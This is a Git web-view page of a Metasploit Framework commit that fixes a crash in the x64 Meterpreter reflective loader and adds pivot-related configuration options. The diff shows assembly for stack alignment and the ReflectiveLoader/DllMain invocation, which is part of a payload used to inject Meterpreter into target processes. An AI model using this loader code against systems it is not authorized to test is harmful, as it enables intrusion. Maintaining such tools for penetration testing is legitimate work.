infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix stager crash and support pivots in x64 meterp loader

bug/bundler_fix
OJ 2017-08-07 20:01:57 +10:00 committed by Brent Cook
parent c8b8ef03bd
commit 4ec87985a2
1 changed files with 11 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
lib/msf/core/payload/windows/x64/meterpreter_loader.rb
View File

@ -42,19 +42,20 @@ module Payload::Windows::MeterpreterLoader_x64
push rbp ; save rbp push rbp ; save rbp
mov rbp, rsp ; set up a new stack frame mov rbp, rsp ; set up a new stack frame
sub rsp, 32 ; allocate some space for calls. sub rsp, 32 ; allocate some space for calls.
and rsp, ~0xF ; Ensure RSP is 16 byte aligned
; GetPC ; GetPC
call $+5 ; relative call to get location call $+5 ; relative call to get location
pop rbx ; pop return value pop rbx ; pop return value
; Invoke ReflectiveLoader() ; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader() ; add the offset to ReflectiveLoader()
add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)} add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x15)}
call rbx ; invoke ReflectiveLoader() call rbx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr) ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
; offset from ReflectiveLoader() to the end of the DLL ; offset from ReflectiveLoader() to the end of the DLL
add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])} add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
^ ^
unless opts[:stageless] unless opts[:stageless] || opts[:force_write_handle] == true
asm << %Q^ asm << %Q^
; store the comms socket or handle ; store the comms socket or handle
mov [rbx], rdi mov [rbx], rdi
@ -79,13 +80,14 @@ module Payload::Windows::MeterpreterLoader_x64
# create the configuration block, which for staged connections is really simple. # create the configuration block, which for staged connections is really simple.
config_opts = { config_opts = {
arch: opts[:uuid].arch, arch: opts[:uuid].arch,
exitfunk: ds['EXITFUNC'], null_session_guid: opts[:null_session_guid] == true,
expiration: ds['SessionExpirationTimeout'].to_i, exitfunk: ds[:exit_func] || ds['EXITFUNC'],
uuid: opts[:uuid], expiration: (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
transports: opts[:transport_config] || [transport_config(opts)], uuid: opts[:uuid],
extensions: [], transports: opts[:transport_config] || [transport_config(opts)],
stageless: opts[:stageless] == true extensions: [],
stageless: opts[:stageless] == true
} }
# create the configuration instance based off the parameters # create the configuration instance based off the parameters